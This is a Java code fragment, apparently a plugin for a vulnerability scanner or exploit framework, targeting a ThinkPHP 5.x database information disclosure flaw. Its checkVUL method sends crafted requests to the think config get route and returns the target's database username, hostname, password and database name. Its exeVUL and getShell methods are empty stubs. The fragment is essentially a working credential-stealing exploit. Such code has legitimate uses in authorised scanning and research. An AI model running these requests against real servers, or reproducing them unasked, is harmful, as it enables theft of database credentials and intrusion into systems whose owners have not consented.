@Override

public Result checkVUL(String url) throws Exception {

Module m = new Module();

String module = m.getModule(url);

ArrayList<String> payload_urls = new ArrayList<String>() {{

add(url + "/?s=" + module + "/think\\config/get&name=database.username");

add(url + "/?s=" + module + "/think\\config/get&name=database.hostname");

add(url + "/?s=" + module + "/think\\config/get&name=database.password");

add(url + "/?s=" + module + "/think\\config/get&name=database.database");

}};

try {

String username = HttpRequest.get(payload_urls.get(0)).body();

if (username.length() >= 20) {

username = null;

}

String hostname = HttpRequest.get(payload_urls.get(1)).body();

if (hostname.length() >= 20) {

hostname = null;

}

String password = HttpRequest.get(payload_urls.get(2)).body();

if (password.length() >= 40) {

password = null;

}

String database = HttpRequest.get(payload_urls.get(3)).body();

if (database.length() >= 20) {

database = null;

}

if (username == null && hostname == null && password == null && database == null) {

return new Result(false, "ThinkPHP 5.x 数据库信息泄露", "");

} else {

return new Result(true, "ThinkPHP 5.x 数据库信息泄露", "username:" + username + " hostname:" + hostname + " password:" + password + " database:" + database);

}

} catch (Exception e) {

e.printStackTrace();

}

return new Result(false, "ThinkPHP 5.x 数据库信息泄露", "");

}

@Override

public Result exeVUL(String url, String cmd) throws Exception {

return new Result(false, "", "");

}

@Override

public Result getShell(String url) throws Exception {

return new Result(false, "", "");

}